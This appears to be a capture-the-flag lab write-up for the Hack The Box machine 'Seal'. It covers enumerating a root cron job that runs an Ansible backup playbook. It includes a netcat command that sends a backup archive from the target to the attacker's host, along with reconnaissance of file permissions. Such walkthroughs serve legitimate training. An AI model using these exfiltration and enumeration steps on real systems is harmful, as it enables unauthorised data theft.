InfoSec LAB

Seal_Ansible

Created: 3 min read

Ansible

As discovered through PSPY, one of the root cronjob processes turn out to be executing a binary located at /usr/bin/ansible-playbook with the /opt/backups/playbook/run.yml file with privileges of the luis user

tomcat@seal:/var/lib/tomcat9$ ll /usr/bin/ansible-playbook
0 lrwxrwxrwx 1 root root 7 Mar 16  2020 /usr/bin/ansible-playbook -> ansible
tomcat@seal:/var/lib/tomcat9$ file /usr/bin/ansible-playbook
/usr/bin/ansible-playbook: symbolic link to ansible

Checking the binary itself reveals that it’s a symbolic link to a command, ansible

tomcat@seal:/var/lib/tomcat9$ which ansible
/usr/bin/ansible
tomcat@seal:/var/lib/tomcat9$ ll /usr/bin/ansible
4.0K lrwxrwxrwx 1 root root 68 Mar 16  2020 /usr/bin/ansible -> ../lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py

The ansible binary is located at /usr/bin/ansible and it appears to be a symbolic link to a Python script as well The Python script is located at /usr/lib/python3/dist-packages/ansible/cli/scripts/ansible_cli_stub.py

/opt/backups

tomcat@seal:/opt/backups$ ll
total 16K
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 16:47 .
4.0K drwxrwxr-x 2 luis luis 4.0K Apr 11 16:47 archives
4.0K drwxrwxr-x 2 luis luis 4.0K May  7  2021 playbook
4.0K drwxr-xr-x 3 root root 4.0K May  7  2021 ..

The /opt/backups directory has 2 sub-directories, one of which was used in the root cronjob process

/opt/backups/playbook/run.yml

tomcat@seal:/opt/backups/playbook$ ll
total 12K
4.0k drwxr-xr-x 4 luis luis 4.0k apr 11 16:58 ..
4.0K drwxrwxr-x 2 luis luis 4.0K May  7  2021 .
4.0K -rw-rw-r-- 1 luis luis  403 May  7  2021 run.yml
tomcat@seal:/opt/backups/playbook$ cat run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

This is the YAML file that gets fed as an argument to /usr/bin/ansible-playbook It contains a set of definitions for variables for a backup operation. The source directory is /var/lib/tomcat9/webapps/ROOT/admin/dashboard, which is mirror to the /admin/dashboard directory over HTTPS The destination directory is set to /opt/backups/archives

/opt/backups/archives

tomcat@seal:/opt/backups$ cd archives ; ll
total 2.4M
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 16:48 ..
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:48 backup-2023-04-11-16:48:32.gz
4.0K drwxrwxr-x 2 luis luis 4.0K Apr 11 16:48 .
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:47 backup-2023-04-11-16:47:32.gz
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:46 backup-2023-04-11-16:46:32.gz
592K -rw-rw-r-- 1 luis luis 592K Apr 11 16:45 backup-2023-04-11-16:45:32.gz

There are 4 backup archives generated by the earlier Python script and YAML file above

tomcat@seal:/opt/backups/archives$ nc 10.10.14.7 2222 < backup-2023-04-11-16:50:32.gz
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ nnc 2222 > backup-2023-04-11-16:50:32.gz
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56036

I copied one of the archives to Kali to check it out

┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ gunzip backup-2023-04-11-16:50:32.gz 
 
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ ls
backup-2023-04-11-16:50:32
 
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ file backup-2023-04-11-16:50:32 
backup-2023-04-11-16:50:32: POSIX tar archive
 
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar xf backup-2023-04-11-16:50:32 
tar: Cannot connect to backup-2023-04-11-16: resolve failed
 
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar -xf backup-2023-04-11-16:50:32 --force-local

It’s a gzip archive. I had to use the --force-local flag in order to resolve the filename as it contains those colons; :

┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ cd dashboard/ ; ll
total 100K
4.0K drwxr-xr-x 5 kali kali 4.0K Apr 11 18:56 bootstrap
4.0K drwxr-xr-x 2 kali kali 4.0K Apr 11 18:56 css
4.0K drwxr-xr-x 4 kali kali 4.0K Apr 11 18:56 images
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 18:56 ..
4.0K drwxr-xr-x 4 kali kali 4.0K Apr 11 18:56 scripts
4.0K drwxr-xr-x 7 kali kali 4.0K May  7  2021 .
4.0K drwxr-xr-x 2 kali kali 4.0K May  7  2021 uploads
 72K -rw-r--r-- 1 kali kali  71K May  6  2021 index.html

The content is indeed the /admin/dashboard directory

Interactive Graph View

Backlinks